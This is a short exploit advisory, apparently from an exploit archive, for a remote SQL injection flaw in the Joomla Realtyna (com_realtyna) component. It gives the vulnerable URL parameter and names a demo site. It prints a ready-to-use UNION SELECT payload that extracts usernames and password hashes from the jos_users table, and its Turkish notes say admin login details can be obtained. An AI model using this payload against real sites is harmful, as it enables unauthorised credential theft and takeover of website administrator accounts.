The Joomla Realtyna component suffers from a remote SQL injection vulnerability.
71701fd502cf42ee319fab3ee755e399709c15338312e694062bd23161e0ad20
<------------------- header data start ------------------- >
#############################################################
Joomla Component realtyna SQL Injection Vulnerability
#############################################################
# Author : Fl0riX ~ Bug Researchers
# Name : Joomla com_realtyna
# Bug Type : SQL injection
# Infection : Admin Login Bilgileri Alinabilir.
# Demo Vuln :
[+]index.php?option=com_realtyna&view=propertyshow&&bedroom=-5&pid=[EXPLOIT]
[+] Demo Sites:
[++]http://demo.nadlancity.org.il
# Note: Bilgiler icin Kaynak Kodlarina Bakin :)
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
1+union+select+1,2,concat(username,0x3a,password)florix,4+from+jos_users--
< -- bug code end of -- >